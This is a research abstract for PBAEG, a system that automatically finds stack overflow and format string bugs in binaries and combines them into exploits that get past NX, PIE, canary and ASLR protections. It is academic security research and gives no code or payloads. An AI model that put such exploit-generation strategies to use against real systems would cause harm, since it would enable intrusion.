Pbaeg: combine-vulnerabilities AEG to defeat protection mechanisms

Pbaeg: combine-vulnerabilities AEG to defeat protection mechanisms

연구 분야: Strategies

학회: Cybersecurity

Automatic exploit generation (AEG) refers to the process of automatically finding the path in the program that can trigger vulnerabilities and generate exploits. Typically, the process of finding vulnerabilities requires fuzzing and symbolic execution techniques. The existing AEG usually sets the preset environment ideally, which does not enable all protection mechanisms. This environment is not universally applicable in actual attacks. In the newest version of GCC, the default compilation configuration has enabled all protection mechanisms. In response to this situation, we propose an exploit generation system Protection Bypass Automatic Exploit Generator (PBAEG) which automatically detects some types of stack overflow vulnerabilities and format string vulnerabilities. Then PBAEG combines the above two vulnerabilities to generate exploits. PBAEG uses symbolic execution and dynamic binary analysis to find the above two vulnerabilities, adopts different exploit generation strategies for different protection mechanisms, and defeats Non-Executable, Position-Independent Executable, Canary, and Address Space Layout Randomization (ASLR) protection mechanisms. At the same time, for some difficult-to-exploit situations, advanced stack overflow exploitation methods are applied to generate exploits. Finally, we also use docker to simulate the remote environment to test the ability of PBAEG to attack the remote environment. Experiments show that PBAEG can complete the vulnerability detection and exploitation generation of 124 binary files, 22 capture-the-flag binary files, and 10 public software, which takes a shorter time than the existing AEG and covers more types of vulnerabilities. PBAEG adopts more vulnerability exploitation techniques, can generate exploits in the form of files by using pwntools, and successfully verifies the exploitations generated in the remote simulation environment.